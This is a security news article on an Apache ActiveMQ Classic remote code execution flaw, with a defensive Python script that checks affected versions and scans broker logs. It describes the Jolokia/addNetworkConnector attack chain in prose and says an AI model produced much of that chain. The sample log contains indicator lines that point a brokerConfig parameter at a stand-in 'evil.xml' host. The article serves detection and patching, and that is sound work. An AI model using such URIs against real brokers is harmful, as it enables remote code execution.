The security community has just learned of a critical vulnerability in Apache ActiveMQ Classic that went undetected for more than a decade and that allows remote command execution on affected systems. The vulnerability is tracked as CVE-2026-34197, carries a high severity score (8.8), and affects ActiveMQ Classic versions before 5.19.4 as well as the 6.x line from 6.0.0 up to, but not including, the fixed release 6.2.3.
ActiveMQ is an open source message broker written in Java, widely used in enterprise infrastructure, web backends and government environments to handle asynchronous communication through queues and topics. Although a more modern branch called Artemis exists, the "Classic" edition remains widely deployed, so this vulnerability has a significant reach in real environments.

What is striking about this finding is not only how long the bug survived but the tool that helped identify the exploitation path: the AI assistant Claude. Horizon3 researcher Naveen Sunkavally explains that with a few prompts he was able to obtain from the model an attack chain that links several product features. According to that account, most of the work was produced by the AI and then refined by the researcher, which illustrates how models can surface interactions between components that traditional analyses overlook.
The technical vector abuses the Jolokia management API exposed by ActiveMQ. That API exposes a broker operation, addNetworkConnector, which, combined with certain remote-loading configuration options, lets the broker fetch a Spring XML file from a location the attacker controls. Code can run while that external configuration is being initialized, which leads to remote command execution. Horizon3 describes this flow and the associated risk in its technical write-up, which includes more detail on the mechanics of the bug and initial recommendations: Horizon3 report.
There is also an aggravating factor: although the operation in principle requires authentication to Jolokia, in certain versions (specifically ActiveMQ 6.0.0 to 6.1.1) that barrier was removed by a separate bug, CVE-2024-32114, which left the API reachable without access control and therefore turned this into an unauthenticated RCE. This partly explains why the problem could go unnoticed for so long: each of the parts involved behaved as expected on its own, but in combination they formed an exploitable chain.
Apache's maintainers were notified at the end of March and published a fix quickly; the patched versions are 5.19.4 and 6.2.3. The official security note and the fix announcement are available on the Apache ActiveMQ site: Apache announcement on CVE-2026-34197. As always in these cases, updating to the patched versions should be the first priority for any system running ActiveMQ Classic.
In addition to updating, the researchers recommend reviewing broker logs for specific indicators: internal vm:// connections that carry remote configuration parameters of the form brokerConfig=xbean:http://, and repeated connection attempts accompanied by warnings about configuration problems. Such messages may indicate that the broker already tried to load a malicious configuration and that command execution may already have taken place.
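As an added example (not code from Horizon3 or the Apache ActiveMQ project), the following Python script turns the two checks above into something you can run during triage: a version test against the affected ranges stated here (5.x before 5.19.4, 6.x before 6.2.3), and a scan of broker log lines for vm:// connector URIs that carry a remote brokerConfig=xbean:http(s):// parameter, grouped by the host that served the configuration. The log layout and the sample lines are constructed for the example; real activemq.log wording will differ, so the detection keys on the URI parameter (after URL-decoding) rather than on message text.

```python
"""Triage helpers for CVE-2026-34197 in ActiveMQ Classic.

Added example; not Horizon3's or Apache's code. The log format and the
SAMPLE_LOG lines are constructed for illustration, not real broker output.
"""
import re
from collections import Counter
from typing import Dict, List
from urllib.parse import unquote, urlparse

FIXED_5X = (5, 19, 4)   # first fixed 5.x release named in the advisory
FIXED_6X = (6, 2, 3)    # first fixed 6.x release named in the advisory


def parse_version(version: str) -> tuple:
    """Turn '5.19.3' or '6.1.1-SNAPSHOT' into a 3-tuple of ints (missing parts -> 0)."""
    nums = [int(n) for n in re.findall(r"\d+", version)[:3]]
    if not nums:
        raise ValueError(f"no version number in {version!r}")
    return tuple(nums + [0] * (3 - len(nums)))


def is_vulnerable(version: str) -> bool:
    """True when the version falls in the affected range described above."""
    v = parse_version(version)
    if v[0] <= 5:
        return v < FIXED_5X          # everything before 5.19.4
    if v[0] == 6:
        return v < FIXED_6X          # 6.0.0 up to, not including, 6.2.3
    return False                     # no other major line is named as affected


# A vm:// URI runs to the next whitespace or quote; its parameters may be URL-encoded.
VM_URI = re.compile(r"vm://[^\s\"'<>]+")
# The indicator: brokerConfig pointing at a remote Spring XML over HTTP(S).
REMOTE_CONFIG = re.compile(r"brokerConfig=xbean:(https?://[^\s\"'&]+)", re.IGNORECASE)
# Log level in the assumed "timestamp | LEVEL | message | ..." layout.
LEVEL = re.compile(r"\|\s*(TRACE|DEBUG|INFO|WARN|ERROR)\s*\|")


def scan_log(text: str) -> List[Dict[str, object]]:
    """Return one finding per log line whose vm:// URI loads a remote brokerConfig."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for raw_uri in VM_URI.findall(line):
            uri = unquote(raw_uri)               # defeat %3A / %2F encoding of the parameter
            m = REMOTE_CONFIG.search(uri)
            if not m:
                continue                         # ordinary vm:// bridge, no remote config
            lvl = LEVEL.search(line)
            findings.append({
                "line": lineno,
                "level": lvl.group(1) if lvl else "?",
                "vm_uri": uri,
                "remote_config": m.group(1),
            })
    return findings


def remote_hosts(findings: List[Dict[str, object]]) -> Dict[str, int]:
    """Count findings per host that served the XML; repeats match the retry pattern described."""
    return dict(Counter(urlparse(str(f["remote_config"])).netloc for f in findings))


# Constructed sample log: one benign vm:// bridge line and two lines carrying the
# remote-config indicator (the second one URL-encoded). Hosts are documentation addresses.
SAMPLE_LOG = """\
2026-04-02 10:15:01,233 | INFO  | Apache ActiveMQ 5.19.3 (localhost) is starting | BrokerService | main
2026-04-02 10:21:44,910 | INFO  | Establishing network connection from vm://localhost?async=false&network=true to tcp://10.0.0.7:61616 | NetworkConnector | main
2026-04-02 10:21:45,002 | WARN  | Could not start network bridge from vm://localhost?brokerConfig=xbean:http://198.51.100.23:8000/evil.xml&create=true : configuration problem | NetworkConnector | main
2026-04-02 10:21:47,118 | WARN  | Could not start network bridge from vm://localhost?brokerConfig=xbean%3Ahttp%3A%2F%2F198.51.100.23%3A8000%2Fevil.xml : configuration problem | NetworkConnector | main
2026-04-02 10:30:00,000 | INFO  | Connector openwire started | TransportConnector | main
"""

if __name__ == "__main__":
    for ver in ("5.18.6", "5.19.4", "6.1.1", "6.2.3"):
        print(f"{ver}: {'VULNERABLE' if is_vulnerable(ver) else 'fixed'}")
    hits = scan_log(SAMPLE_LOG)
    for h in hits:
        print(f"line {h['line']} [{h['level']}] remote config {h['remote_config']}")
    print("hits per remote host:", remote_hosts(hits))
```

Run it against a copy of activemq.log (for example `scan_log(open(path).read())`) and pivot on the hosts reported by remote_hosts(): the XML they served is what the broker tried to initialize, so a warning about a configuration problem is not proof that the attempt failed, and repeated hits from one host are the pattern the researchers describe.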

ActiveMQ's track record in real incidents makes this advisory particularly relevant. Earlier vulnerabilities in the same product have been exploited in real-world attacks, and some of them appear in public catalogues of exploited vulnerabilities, so infrastructure operators should treat this patch as urgent. For context on older vulnerabilities and their exploitation in the field, CISA's catalogue of known exploited vulnerabilities is a useful resource: CISA KEV.
Beyond the immediate patch, this case holds a lesson for software security: automated analysis and traditional reviews can miss attack paths that emerge from the interaction between independently developed modules. AI tools are proving valuable in supporting vulnerability discovery, but that also underlines the need to integrate that capability into audit processes, security testing and access control, rather than treating it as a substitute for human review.
If you manage ActiveMQ Classic instances, update as soon as possible, restrict access to the Jolokia management API with network controls and strong authentication, and examine your logs for abnormal patterns involving vm:// connections and remote configuration-loading parameters. For technical details and mitigations, the Horizon3 report and Apache's advisory are the key references: Horizon3 and Apache ActiveMQ.